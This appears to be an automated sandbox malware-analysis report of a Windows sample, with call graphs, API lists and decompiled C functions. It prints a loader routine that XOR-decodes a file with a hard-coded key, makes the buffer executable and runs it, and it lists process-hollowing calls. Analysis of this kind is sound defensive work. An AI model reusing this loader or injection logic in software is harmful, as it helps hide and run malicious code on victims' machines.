2 API calls 7627->7628 7629 1321b26 7628->7629 7629->7053 7631 1321876 _doexit 7630->7631 7632 13218bf 7631->7632 7633 132188a _memset 7631->7633 7642 13218b4 _doexit 7631->7642 7634 132332b __lock_file 65 API calls 7632->7634 7635 13231da __mbsnbcmp_l 64 API calls 7633->7635 7636 13218c7 7634->7636 7638 13218a4 7635->7638 7643 1321660 7636->7643 7640 1323941 __mbsnbcmp_l 6 API calls 7638->7640 7640->7642 7642->7057 7646 132167e _memset 7643->7646 7649 132169c 7643->7649 7644 1321687 7645 13231da __mbsnbcmp_l 64 API calls 7644->7645 7647 132168c 7645->7647 7646->7644 7646->7649 7655 13216db 7646->7655 7648 1323941 __mbsnbcmp_l 6 API calls 7647->7648 7648->7649 7659 13218f6 7649->7659 7651 13217f9 _memset 7656 13231da __mbsnbcmp_l 64 API calls 7651->7656 7652 1321825 _memset 7657 13231da __mbsnbcmp_l 64 API calls 7652->7657 7653 13242a5 __fileno 64 API calls 7653->7655 7655->7649 7655->7651 7655->7652 7655->7653 7662 13241a8 7655->7662 7692 1323abb 7655->7692 7712 13242d7 7655->7712 7656->7647 7657->7647 7660 132339e _ftell 2 API calls 7659->7660 7661 13218fe 7660->7661 7661->7642 7663 13241b4 _doexit 7662->7663 7664 13241d7 7663->7664 7665 13241bc 7663->7665 7667 13241e5 7664->7667 7671 1324226 7664->7671 7666 13231ed __read_nolock 64 API calls 7665->7666 7669 13241c1 7666->7669 7668 13231ed __read_nolock 64 API calls 7667->7668 7670 13241ea 7668->7670 7672 13231da __mbsnbcmp_l 64 API calls 7669->7672 7673 13231da __mbsnbcmp_l 64 API calls 7670->7673 7674 1324233 7671->7674 7675 1324247 7671->7675 7685 13241c9 _doexit 7672->7685 7677 13241f1 7673->7677 7678 13231ed __read_nolock 64 API calls 7674->7678 7676 13274f3 ___lock_fhandle 65 API calls 7675->7676 7679 132424d 7676->7679 7683 1323941 __mbsnbcmp_l 6 API calls 7677->7683 7680 1324238 7678->7680 7681 1324270 7679->7681 7682 132425a 7679->7682 7684 13231da __mbsnbcmp_l 64 API calls 7680->7684 7687 13231da __mbsnbcmp_l 64 API calls 7681->7687 7724 1323be6 7682->7724 7683->7685 7684->7677 7685->7655 7689 1324275 7687->7689 7688 1324268 7793 132429b 7688->7793 7690 13231ed __read_nolock 64 API calls 7689->7690 7690->7688 7693 1323acb 7692->7693 7697 1323ae8 7692->7697 7694 13231da __mbsnbcmp_l 64 API calls 7693->7694 7695 1323ad0 7694->7695 7696 1323941 __mbsnbcmp_l 6 API calls 7695->7696 7704 1323ae0 7696->7704 7698 1323b1d 7697->7698 7697->7704 7797 13272a7 7697->7797 7700 13242a5 __fileno 64 API calls 7698->7700 7701 1323b31 7700->7701 7702 13241a8 __read 76 API calls 7701->7702 7703 1323b38 7702->7703 7703->7704 7705 13242a5 __fileno 64 API calls 7703->7705 7704->7655 7706 1323b5b 7705->7706 7706->7704 7707 13242a5 __fileno 64 API calls 7706->7707 7708 1323b67 7707->7708 7708->7704 7709 13242a5 __fileno 64 API calls 7708->7709 7710 1323b73 7709->7710 7711 13242a5 __fileno 64 API calls 7710->7711 7711->7704 7713 13242e7 7712->7713 7714 13242eb 7712->7714 7713->7655 7715 13242f0 7714->7715 7717 1324326 _memset 7714->7717 7719 1324315 7714->7719 7716 13231da __mbsnbcmp_l 64 API calls 7715->7716 7718 13242f5 7716->7718 7717->7715 7721 132433a 7717->7721 7722 1323941 __mbsnbcmp_l 6 API calls 7718->7722 7720 1327760 _memcpy_s __VEC_memcpy 7719->7720 7720->7713 7721->7713 7723 13231da __mbsnbcmp_l 64 API calls 7721->7723 7722->7713 7723->7718 7725 1323c02 7724->7725 7726 1323c1d 7724->7726 7728 13231ed __read_nolock 64 API calls 7725->7728 7727 1323c2c 7726->7727 7729 1323c53 7726->7729 7730 13231ed __read_nolock 64 API calls 7727->7730 7731 1323c07 7728->7731 7734 1323c72 7729->7734 7745 1323c86 7729->7745 7733 1323c31 7730->7733 7732 13231da __mbsnbcmp_l 64 API calls 7731->7732 7746 1323c0f 7732->7746 7736 13231da __mbsnbcmp_l 64 API calls 7733->7736 7737 13231ed __read_nolock 64 API calls 7734->7737 7735 1323cde 7739 13231ed __read_nolock 64 API calls 7735->7739 7738 1323c38 7736->7738 7740 1323c77 7737->7740 7741 1323941 __mbsnbcmp_l 6 API calls 7738->7741 7742 1323ce3 7739->7742 7743 13231da __mbsnbcmp_l 64 API calls 7740->7743 7741->7746 7747 13231da __mbsnbcmp_l 64 API calls 7742->7747 7744 1323c7e 7743->7744 7749 1323941 __mbsnbcmp_l 6 API calls 7744->7749 7745->7735 7745->7746 7748 1323cba 7745->7748 7750 1323cff 7745->7750 7746->7688 7747->7744 7748->7735 7753 1323cc5 ReadFile 7748->7753 7749->7746 7752 132570b __malloc_crt 64 API calls 7750->7752 7754 1323d15 7752->7754 7755 1323df1 7753->7755 7756 132416c GetLastError 7753->7756 7759 1323d3b 7754->7759 7760 1323d1d 7754->7760 7755->7756 7763 1323e05 7755->7763 7757 1323ff2 7756->7757 7758 1324179 7756->7758 7768 1323200 __dosmaperr 64 API calls 7757->7768 7772 1323f77 7757->7772 7761 13231da __mbsnbcmp_l 64 API calls 7758->7761 7764 13272f0 __lseeki64_nolock 66 API calls 7759->7764 7762 13231da __mbsnbcmp_l 64 API calls 7760->7762 7766 132417e 7761->7766 7767 1323d22 7762->7767 7763->7772 7773 1323e21 7763->7773 7775 1324037 7763->7775 7765 1323d47 7764->7765 7765->7753 7769 13231ed __read_nolock 64 API calls 7766->7769 7770 13231ed __read_nolock 64 API calls 7767->7770 7768->7772 7769->7772 7770->7746 7771 132567d __read_nolock 64 API calls 7771->7746 7772->7746 7772->7771 7774 1323e87 ReadFile 7773->7774 7781 1323f04 7773->7781 7779 1323ea5 GetLastError 7774->7779 7784 1323eaf 7774->7784 7775->7772 7776 13240af ReadFile 7775->7776 7777 13240ce GetLastError 7776->7777 7785 13240d8 7776->7785 7777->7775 7777->7785 7778 1323fc8 MultiByteToWideChar 7778->7772 7780 1323fec GetLastError 7778->7780 7779->7773 7779->7784 7780->7757 7781->7772 7782 1323f72 7781->7782 7783 1323f7f 7781->7783 7789 1323f3c 7781->7789 7786 13231da __mbsnbcmp_l 64 API calls 7782->7786 7783->7789 7790 1323fb6 7783->7790 7784->7773 7787 13272f0 __lseeki64_nolock 66 API calls 7784->7787 7785->7775 7788 13272f0 __lseeki64_nolock 66 API calls 7785->7788 7786->7772 7787->7784 7788->7785 7789->7778 7791 13272f0 __lseeki64_nolock 66 API calls 7790->7791 7792 1323fc5 7791->7792 7792->7778 7796 1327593 LeaveCriticalSection 7793->7796 7795 13242a3 7795->7685 7796->7795 7798 132570b __malloc_crt 64 API calls 7797->7798 7799 13272bc 7798->7799 7799->7698 7800->7060 7829 2b1298f GetPEB 7801->7829 7803 2b1317c 7830 2b1298f GetPEB 7803->7830 7805 2b1318f 7831 2b1298f GetPEB 7805->7831 7807 2b131a2 7832 2b1310a 7807->7832 7809 2b131b0 7810 2b131cc VirtualAllocExNuma 7809->7810 7811 2b131d9 7810->7811 7837 2b1306a 7811->7837 7844 2b1298f GetPEB 7814->7844 7816 2b12ce3 7816->7068 7817 2b12cf1 CreateProcessW 7818 2b12d20 GetThreadContext 7817->7818 7821 2b12d1b 7817->7821 7819 2b12d40 ReadProcessMemory 7818->7819 7818->7821 7819->7821 7827 2b12b48 7819->7827 7821->7816 7872 2b13bf5 7821->7872 7823 2b13da4 11 API calls 7823->7827 7825 2b12fa5 SetThreadContext 7825->7821 7825->7827 7827->7816 7827->7817 7827->7821 7827->7823 7827->7825 7828 2b13bf5 11 API calls 7827->7828 7845 2b13c8a 7827->7845 7854 2b13a43 7827->7854 7863 2b13b44 7827->7863 7828->7827 7829->7803 7830->7805 7831->7807 7842 2b1298f GetPEB 7832->7842 7834 2b1311a 7835 2b13120 GetSystemInfo 7834->7835 7836 2b1314b 7835->7836 7836->7809 7843 2b1298f GetPEB 7837->7843 7839 2b13076 7840 2b13096 VirtualAlloc 7839->7840 7841 2b130b3 7840->7841 7841->7062 7842->7834 7843->7839 7844->7827 7846 2b13ca5 7845->7846 7881 2b12a6e GetPEB 7846->7881 7848 2b13cc6 7849 2b13d7e 7848->7849 7850 2b13cce 7848->7850 7898 2b140d0 7849->7898 7883 2b13844 7850->7883 7853 2b13d65 7853->7827 7855 2b13a5e 7854->7855 7856 2b12a6e GetPEB 7855->7856 7857 2b13a7f 7856->7857 7858 2b13b11 7857->7858 7859 2b13a87 7857->7859 7908 2b140f4 7858->7908 7860 2b13844 10 API calls 7859->7860 7862 2b13af8 7860->7862 7862->7827 7864 2b13b5f 7863->7864 7865 2b12a6e GetPEB 7864->7865 7866 2b13b80 7865->7866 7867 2b13b84 7866->7867 7868 2b13bca 7866->7868 7870 2b13844 10 API calls 7867->7870 7911 2b14106 7868->7911 7871 2b13bbf 7870->7871 7871->7827 7873 2b13c08 7872->7873 7874 2b12a6e GetPEB 7873->7874 7875 2b13c29 7874->7875 7876 2b13c73 7875->7876 7877 2b13c2d 7875->7877 7914 2b140be 7876->7914 7879 2b13844 10 API calls 7877->7879 7880 2b13c68 7879->7880 7880->7816 7882 2b12a90 7881->7882 7882->7848 7901 2b1298f GetPEB 7883->7901 7885 2b1388d 7902 2b12a39 GetPEB 7885->7902 7888 2b1391a 7889 2b1392b VirtualAlloc 7888->7889 7894 2b139ef 7888->7894 7890 2b13941 ReadFile 7889->7890 7889->7894 7891 2b13956 VirtualAlloc 7890->7891 7890->7894 7891->7894 7895 2b13977 7891->7895 7892 2b13a38 7892->7853 7893 2b13a2d VirtualFree 7893->7892 7894->7892 7894->7893 7895->7894 7896 2b139e2 VirtualFree 7895->7896 7897 2b139de FindCloseChangeNotification 7895->7897 7896->7894 7897->7896 7899 2b13844 10 API calls 7898->7899 7900 2b140da 7899->7900 7900->7853 7901->7885 7903 2b12a4c 7902->7903 7905 2b12a61 CreateFileW 7903->7905 7906 2b12aab GetPEB 7903->7906 7905->7888 7905->7894 7907 2b12acf 7906->7907 7907->7903 7909 2b13844 10 API calls 7908->7909 7910 2b140fe 7909->7910 7910->7862 7912 2b13844 10 API calls 7911->7912 7913 2b14110 7912->7913 7913->7871 7915 2b13844 10 API calls 7914->7915 7916 2b140c8 7915->7916 7916->7880 7918 1322dfc _doexit 7917->7918 7919 1321f64 __lock 64 API calls 7918->7919 7920 1322e03 7919->7920 7921 1322ebc __initterm 7920->7921 7923 1325056 __decode_pointer 6 API calls 7920->7923 7934 1322f07 7921->7934 7925 1322e3a 7923->7925 7925->7921 7928 1325056 __decode_pointer 6 API calls 7925->7928 7927 1322f04 _doexit 7927->6112 7933 1322e4f 7928->7933 7929 1322efb 7930 1322d00 _doexit 3 API calls 7929->7930 7930->7927 7931 1325056 6 API calls __decode_pointer 7931->7933 7932 132504d 7 API calls __init_pointers 7932->7933 7933->7921 7933->7931 7933->7932 7935 1322ee8 7934->7935 7936 1322f0d 7934->7936 7935->7927 7938 1321e8a LeaveCriticalSection 7935->7938 7939 1321e8a LeaveCriticalSection 7936->7939 7938->7929 7939->7935 8007 1321000 8008 132100a _wcschr 8007->8008 8017 1321022 8007->8017 8009 1321047 8008->8009 8010 13210c8 _wcsrchr 8008->8010 8008->8017 8011 1321063 lstrlenW 8009->8011 8009->8017 8013 13210df 8010->8013 8014 132115d lstrlenW 8010->8014 8012 1321084 lstrcpyW 8011->8012 8011->8017 8015 1327760 _memcpy_s __VEC_memcpy 8012->8015 8016 13210fe lstrlenW 8013->8016 8013->8017 8014->8017 8018 1321178 lstrcpyW 8014->8018 8015->8017 8016->8017 8019 132111c lstrcpyW 8016->8019 8018->8017 8020 1327760 _memcpy_s __VEC_memcpy 8019->8020 8020->8017 8141 1325e40 8142 1325e43 8141->8142 8143 1329622 _abort 66 API calls 8142->8143 8144 1325e4f _doexit 8143->8144 8205 132ad80 8206 132ad91 8205->8206 8207 132ad99 8205->8207 8206->8207 8209 132ad96 CloseHandle 8206->8209 8208 132adab 8207->8208 8210 132ada8 CloseHandle 8207->8210 8209->8207 8210->8208 8228 1322ac0 8229 1322af9 8228->8229 8230 1322aec 8228->8230 8232 1325b55 __crtLCMapStringA_stat 5 API calls 8229->8232 8231 1325b55 __crtLCMapStringA_stat 5 API calls 8230->8231 8231->8229 8241 1322b09 __except_handler4 __IsNonwritableInCurrentImage 8232->8241 8233 1322b62 __except_handler4 8234 1322b8c 8233->8234 8235 1322b7c 8233->8235 8236 1325b55 __crtLCMapStringA_stat 5 API calls 8233->8236 8237 1325b55 __crtLCMapStringA_stat 5 API calls 8235->8237 8236->8235 8237->8234 8239 1322bdb __except_handler4 8240 1322c0f 8239->8240 8242 1325b55 __crtLCMapStringA_stat 5 API calls 8239->8242 8243 1325b55 __crtLCMapStringA_stat 5 API calls 8240->8243 8241->8233 8241->8234 8244 1323a8a RtlUnwind 8241->8244 8242->8240 8243->8233 8244->8239 8021 132330b 8028 1324909 8021->8028 8024 132331e 8026 132567d __read_nolock 64 API calls 8024->8026 8027 1323329 8026->8027 8041 132482f 8028->8041 8030 1323310 8030->8024 8031 132646e 8030->8031 8032 132647a _doexit 8031->8032 8033 1321f64 __lock 64 API calls 8032->8033 8036 1326486 8033->8036 8034 13264ef 8071 1326504 8034->8071 8036->8034 8038 13264c4 DeleteCriticalSection 8036->8038 8058 13297d0 8036->8058 8037 13264fb _doexit 8037->8024 8040 132567d __read_nolock 64 API calls 8038->8040 8040->8036 8042 132483b _doexit 8041->8042 8043 1321f64 __lock 64 API calls 8042->8043 8049 132484a 8043->8049 8044 13248e2 8054 1324900 8044->8054 8046 132336c _flsall 65 API calls 8046->8049 8047 13248ee _doexit 8047->8030 8049->8044 8049->8046 8050 13247e7 102 API calls __fflush_nolock 8049->8050 8051 13248d1 8049->8051 8050->8049 8052 13233da __getstream 2 API calls 8051->8052 8053 13248df 8052->8053 8053->8049 8057 1321e8a LeaveCriticalSection 8054->8057 8056 1324907 8056->8047 8057->8056 8059 13297dc _doexit 8058->8059 8060 13297f0 8059->8060 8061 132980d 8059->8061 8062 13231da __mbsnbcmp_l 64 API calls 8060->8062 8063 132332b __lock_file 65 API calls 8061->8063 8068 1329805 _doexit 8061->8068 8064 13297f5 8062->8064 8065 1329825 8063->8065 8066 1323941 __mbsnbcmp_l 6 API calls 8064->8066 8074 1329759 8065->8074 8066->8068 8068->8036 8124 1321e8a LeaveCriticalSection 8071->8124 8073 132650b 8073->8037 8075 1329789 8074->8075 8076 132976d 8074->8076 8078 1329782 8075->8078 8080 132477f __flush 98 API calls 8075->8080 8077 13231da __mbsnbcmp_l 64 API calls 8076->8077 8079 1329772 8077->8079 8090 1329844 8078->8090 8081 1323941 __mbsnbcmp_l 6 API calls 8079->8081 8082 1329795 8080->8082 8081->8078 8093 132abac 8082->8093 8085 13242a5 __fileno 64 API calls 8086 13297a3 8085->8086 8097 1329a9e 8086->8097 8088 13297a9 8088->8078 8089 132567d __read_nolock 64 API calls 8088->8089 8089->8078 8091 132339e _ftell 2 API calls 8090->8091 8092 132984a 8091->8092 8092->8068 8094 132abbc 8093->8094 8096 132979d 8093->8096 8095 132567d __read_nolock 64 API calls 8094->8095 8094->8096 8095->8096 8096->8085 8098 1329aaa _doexit 8097->8098 8099 1329ab2 8098->8099 8100 1329acd 8098->8100 8102 13231ed __read_nolock 64 API calls 8099->8102 8101 1329adb 8100->8101 8107 1329b1c 8100->8107 8103 13231ed __read_nolock 64 API calls 8101->8103 8104 1329ab7 8102->8104 8106 1329ae0 8103->8106 8105 13231da __mbsnbcmp_l 64 API calls 8104->8105 8117 1329abf _doexit 8105->8117 8108 13231da __mbsnbcmp_l 64 API calls 8106->8108 8109 13274f3 ___lock_fhandle 65 API calls 8107->8109 8110 1329ae7 8108->8110 8111 1329b22 8109->8111 8114 1323941 __mbsnbcmp_l 6 API calls 8110->8114 8112 1329b2f 8111->8112 8113 1329b3d 8111->8113 8115 1329a02 __close_nolock 67 API calls 8112->8115 8116 13231da __mbsnbcmp_l 64 API calls 8113->8116 8114->8117 8118 1329b37 8115->8118 8116->8118 8117->8088 8120 1329b61 8118->8120 8123 1327593 LeaveCriticalSection 8120->8123 8122 1329b69 8122->8117 8123->8122 8124->8073 8211 1321d8b 8214 1324963 8211->8214 8215 1325229 __getptd_noexit 64 API calls 8214->8215 8216 1321d9c 8215->8216 8245 13250c8 TlsAlloc 7940 132504d 7941 1324fdb __encode_pointer 7 API calls 7940->7941 7942 1325054 7941->7942

                            Executed Functions

                            Function 01321210 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 44%
                            			E01321210(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v20;
				char* _v24;
				long _v28;
				void* _v32;
				long _v36;
				void* __ebp;
				intOrPtr _t35;
				long _t37;
				void* _t40;

				_v12 = 0;
				_v28 = 0;
				_v24 = "248058040134";
				_t35 = E01321649(_a12, 0x13300f8); // executed
				_v20 = _t35;
				_push(2);
				_push(0);
				_push(_v20); // executed
				E01321BB2(__ebx, __edx, __edi, __esi, __eflags); // executed
				_push(_v20); // executed
				_t37 = E01321ABA(__ebx, _v20, __edi, __esi, __eflags); // executed
				_v28 = _t37;
				_push(0);
				_push(0);
				_push(_v20); // executed
				E01321BB2(__ebx, _v20, __edi, __esi, __eflags); // executed
				_t40 = E0132148F(__ebx, _v20, __edi, _v28); // executed
				_v32 = _t40;
				E01321900(_v32, _v28, 1, _v20); // executed
				while(_v12 < _v28) {
					asm("cdq");
					 *(_v32 + _v12) =  *(_v32 + _v12) & 0x000000ff ^ _v24[_v12 % 0xc] & 0x000000ff;
					_v12 = _v12 + 1;
				}
				VirtualProtect(_v32, _v28, 0x40,  &_v36); // executed
				return _v32();
			}













                            0x01321216
                            0x0132121d
                            0x01321224
                            0x01321234
                            0x0132123c
                            0x0132123f
                            0x01321241
                            0x01321246
                            0x01321247
                            0x01321252
                            0x01321253
                            0x0132125b
                            0x0132125e
                            0x01321260
                            0x01321265
                            0x01321266
                            0x01321272
                            0x0132127a
                            0x0132128b
                            0x01321293
                            0x0132129e
                            0x013212be
                            0x013212c6
                            0x013212c6
                            0x013212d9
                            0x013212e5

                            APIs
                              • Part of subcall function 01321649: __fsopen.LIBCMT ref: 01321656
                            • _fseek.LIBCMT ref: 01321247
                            • _ftell.LIBCMT ref: 01321253
                            • _fseek.LIBCMT ref: 01321266
                              • Part of subcall function 01321BB2: __lock_file.LIBCMT ref: 01321BFD
                              • Part of subcall function 01321BB2: __fseek_nolock.LIBCMT ref: 01321C0D
                            • _malloc.LIBCMT ref: 01321272
                              • Part of subcall function 0132148F: __FF_MSGBANNER.LIBCMT ref: 013214B2
                              • Part of subcall function 0132148F: __NMSG_WRITE.LIBCMT ref: 013214B9
                              • Part of subcall function 0132148F: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,0132571C,?,00000001,?,?,01321EEE,00000018,0132D4A0,0000000C,01321F7F), ref: 01321506
                            • __fread_nolock.LIBCMT ref: 0132128B
                            • VirtualProtect.KERNELBASE(?,00000000,00000040,?), ref: 013212D9
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: _fseek$AllocateHeapProtectVirtual__fread_nolock__fseek_nolock__fsopen__lock_file_ftell_malloc
                            • String ID: 248058040134
                            • API String ID: 2202995300-1212554544
                            • Opcode ID: d51fae8fe603ac936a14a94fff12bff750d8c32aca57c406faffb40e1932159c
                            • Instruction ID: f1bfeb3cd10206685e5728230f941454a6bac0d9a4406f8d9f18214ab653cb0d
                            • Opcode Fuzzy Hash: d51fae8fe603ac936a14a94fff12bff750d8c32aca57c406faffb40e1932159c
                            • Instruction Fuzzy Hash: 82217FB1E0021A9FDB04EFD4C881FBFBB75BF94304F144558E611A7240D675AA51CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 02B131E7 Relevance: 6.5, APIs: 4, Instructions: 501COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 262 2b131e7-2b132db call 2b1298f call 2b13168 call 2b129a3 * 8 284 2b132e2-2b132f2 262->284 285 2b132dd 262->285 288 2b132f4 284->288 289 2b132f9-2b1331c CreateFileW 284->289 286 2b13840-2b13843 285->286 288->286 290 2b13323-2b13349 VirtualAlloc ReadFile 289->290 291 2b1331e 289->291 292 2b13350-2b13363 290->292 293 2b1334b 290->293 291->286 295 2b13369-2b13825 292->295 296 2b1382a-2b13839 call 2b12b3a 292->296 293->286 299 2b1383b-2b1383d ExitProcess 296->299
                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID: AllocNumaVirtual
                            • String ID:
                            • API String ID: 4233825816-0
                            • Opcode ID: e2fc9926c0d77a3c79a5ae3bf6f131bafcd861332a03ca146282b38218a9daa9
                            • Instruction ID: 1bb9d2591be88df03d71ee10ee552d84000dc2cfaed09b3d3d341245ae6fed2a
                            • Opcode Fuzzy Hash: e2fc9926c0d77a3c79a5ae3bf6f131bafcd861332a03ca146282b38218a9daa9
                            • Instruction Fuzzy Hash: 40325360D5D2E8ADDF02CBE984507FDBFB05E2A102F0841D6E4E5B6283D13A934EDB25
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 02B1310A Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 353 2b1310a-2b13150 call 2b1298f call 2b129a3 GetSystemInfo 359 2b13152-2b13155 353->359 360 2b13159 353->360 361 2b1315b-2b1315e 359->361 360->361
                            APIs
                            • GetSystemInfo.KERNELBASE(?), ref: 02B13127
                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID: InfoSystem
                            • String ID:
                            • API String ID: 31276548-0
                            • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                            • Instruction ID: 10711d6acd6258bc5d3053ab86220c849f89c1842c287cb97a36ed9fd8839b8d
                            • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                            • Instruction Fuzzy Hash: B9F0EC71D1410CABDF48E7FC88457BEB7EDD70A200F5046FDDB06D2240E63085908761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 02B13844 Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,02B140DA,7FAB7E30), ref: 02B1390A
                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,02B140DA,7FAB7E30,02B13D98,00000000,00000040), ref: 02B13934
                            • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,02B140DA,7FAB7E30,02B13D98,00000000), ref: 02B1394B
                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,02B140DA,7FAB7E30,02B13D98,00000000,00000040), ref: 02B1396D
                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,02B140DA,7FAB7E30,02B13D98,00000000,00000040,?,00000000,0000000E), ref: 02B139DF
                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,02B140DA,7FAB7E30,02B13D98,00000000,00000040,?), ref: 02B139EA
                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,02B140DA,7FAB7E30,02B13D98,00000000,00000040,?), ref: 02B13A35
                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                            • String ID:
                            • API String ID: 656311269-0
                            • Opcode ID: c457d14a0cbd690d6bd0e7763edf856a49aff49a7c87b750f7cc80aa2c616f14
                            • Instruction ID: 76e01d2175e1977b85d642d225c9517e4369f80946b89bf1f3f18be492425738
                            • Opcode Fuzzy Hash: c457d14a0cbd690d6bd0e7763edf856a49aff49a7c87b750f7cc80aa2c616f14
                            • Instruction Fuzzy Hash: 72518F71E10319ABDB109FF8DC84BAEBBB9EF04750F5045A5FA51F7280E7749A008B68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01321660 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 71 1321660-132167c 72 132167e-1321681 71->72 73 132169f 71->73 72->73 75 1321683-1321685 72->75 74 13216a1-13216a5 73->74 76 13216a6-13216ab 75->76 77 1321687-1321696 call 13231da 75->77 78 13216ba-13216bd 76->78 79 13216ad-13216b8 76->79 89 1321697-132169c call 1323941 77->89 82 13216ca-13216cc 78->82 83 13216bf-13216c7 call 1324360 78->83 79->78 81 13216db-13216ee 79->81 87 13216f0-13216f6 81->87 88 13216f8 81->88 82->77 86 13216ce-13216d9 82->86 83->82 86->77 86->81 91 13216ff-1321701 87->91 88->91 89->73 93 13217f1-13217f4 91->93 94 1321707-132170e 91->94 93->74 96 1321710-1321715 94->96 97 1321754-1321757 94->97 96->97 100 1321717 96->100 98 13217c1-13217c2 call 1323abb 97->98 99 1321759-132175d 97->99 108 13217c7-13217cb 98->108 104 132177e-1321785 99->104 105 132175f-1321768 99->105 101 1321852 100->101 102 132171d-1321721 100->102 111 1321856-132185f 101->111 106 1321723 102->106 107 1321725-1321728 102->107 112 1321787 104->112 113 1321789-132178c 104->113 109 1321773-1321778 105->109 110 132176a-1321771 105->110 106->107 114 13217f9-13217ff 107->114 115 132172e-132174f call 13242d7 107->115 108->111 116 13217d1-13217d5 108->116 117 132177a-132177c 109->117 110->117 111->74 112->113 118 1321792-132179e call 13242a5 call 13241a8 113->118 119 1321825-1321829 113->119 125 1321810-1321820 call 13231da 114->125 126 1321801-132180d call 1324360 114->126 132 13217e9-13217eb 115->132 116->119 124 13217d7-13217e6 116->124 117->113 139 13217a3-13217a8 118->139 122 132183b-132184d call 13231da 119->122 123 132182b-1321838 call 1324360 119->123 122->89 123->122 124->132 125->89 126->125 132->93 132->94 140 1321864-1321868 139->140 141 13217ae-13217b1 139->141 140->111 141->101 142 13217b7-13217bf 141->142 142->132
                            C-Code - Quality: 85%
                            			E01321660(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E01324360(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E01323ABB(_t120, _t125, _t133); // executed
